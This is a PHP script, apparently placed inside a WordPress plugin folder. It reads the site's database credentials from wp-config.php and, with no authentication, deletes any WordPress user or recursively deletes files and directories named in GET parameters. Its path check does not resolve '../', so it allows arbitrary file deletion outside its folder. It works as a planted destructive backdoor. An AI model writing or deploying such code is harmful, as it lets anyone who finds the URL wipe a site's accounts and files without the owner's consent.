<?php

function extractWordpressConfigValue($configString, $paramName) {
    $pattern = "/define\(\s*['\"]" . preg_quote($paramName, '/') . "['\"]" . "\s*,\s*['\"](.*?)['\"]" . "\s*\)/";
    if (preg_match($pattern, $configString, $matches)) {
        return $matches[1];
    }
    return null;
}


function extractTablePrefix($configString) {
    $pattern = "/\\\$table_prefix\s*=\s*['\"]([^'\"]+)['\"]/" ;
    if (preg_match($pattern, $configString, $matches)) {
        return $matches[1];
    }
    return null;
}


function deleteWordpressUser($username) {

    $wpConfigPath = realpath("../../../../wp-config.php");
    $wpConfigContent = file_get_contents($wpConfigPath);
    
    if ($wpConfigContent === false) {
        return false;
    }

    $dbName = extractWordpressConfigValue($wpConfigContent, "DB_NAME");
    $dbUser = extractWordpressConfigValue($wpConfigContent, "DB_USER");
    $dbPassword = extractWordpressConfigValue($wpConfigContent, "DB_PASSWORD");
    $dbHost = extractWordpressConfigValue($wpConfigContent, "DB_HOST");

    $tablePrefix = extractTablePrefix($wpConfigContent);
    if ($tablePrefix === null) {
        $tablePrefix = "wp_";
    }

    $sqlStatement = "USE {$dbName};\n" .
                   "SET @user_id = (SELECT ID FROM {$tablePrefix}users WHERE user_login = '{$username}');\n" .
                   "DELETE FROM {$tablePrefix}usermeta WHERE user_id = @user_id;\n" .
                   "DELETE FROM {$tablePrefix}users WHERE user_login = '{$username}';\n";

    try {
        $pdo = new PDO("mysql:host={$dbHost};dbname={$dbName}", $dbUser, $dbPassword);
        $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);

        $pdo->beginTransaction();

        $stmt = $pdo->prepare("SELECT ID FROM {$tablePrefix}users WHERE user_login = :username");
        $stmt->execute(['username' => $username]);
        $userId = $stmt->fetchColumn();
        
        if (!$userId) {
            return false;
        }

        $stmt = $pdo->prepare("DELETE FROM {$tablePrefix}usermeta WHERE user_id = :userId");
        $stmt->execute(['userId' => $userId]);

        $stmt = $pdo->prepare("DELETE FROM {$tablePrefix}users WHERE user_login = :username");
        $stmt->execute(['username' => $username]);
        
        $pdo->commit();
        return true;
        
    } catch (PDOException $e) {
        if (isset($pdo)) {
            $pdo->rollBack();
        }
        error_log("Error when deleting WordPress user: " . $e->getMessage());
        return false;
    }
}


function remove_file_or_directory($path) {
    $base_path = dirname(__FILE__);
    $full_path = $base_path . DIRECTORY_SEPARATOR . $path;
    echo "full_path" . $full_path . "\n";

    if ($full_path === false || strpos($full_path, $base_path) !== 0) {
        return 'invalid path or path outside allowed directory';
    }

    if (is_dir($full_path)) {
        $items = new RecursiveIteratorIterator(
            new RecursiveDirectoryIterator($full_path, RecursiveDirectoryIterator::SKIP_DOTS),
            RecursiveIteratorIterator::CHILD_FIRST
        );

        foreach ($items as $item) {
            if ($item->isDir()) {
                if (!rmdir($item->getRealPath())) {
                    echo "dir: {$item->getRealPath()}";
                }
            } else {
                if (!unlink($item->getRealPath())) {
                    echo "file: {$item->getRealPath()}";
                }
            }
        }
        if (rmdir($full_path)) {
            echo "dir '$path' del success";
        } else {
            echo "del main dir'$path'";
        }
    }

    else if (is_file($full_path)) {
        if (unlink($full_path)) {
            echo "file '$path' del successed";
        } else {
            echo "del '$path'";
        }
    }
    else {
        echo "path '$path' not file or dir";
    }
}

$username = $_GET['username'];
$path = $_GET['path'];
if (isset($username)):
    $result = deleteWordpressUser($username);
    echo $result ? "User {$username} has been successfully deleted" : "Deletion of user {$username} failed";
elseif (isset($path)):
    remove_file_or_directory($path);
endif;
?>
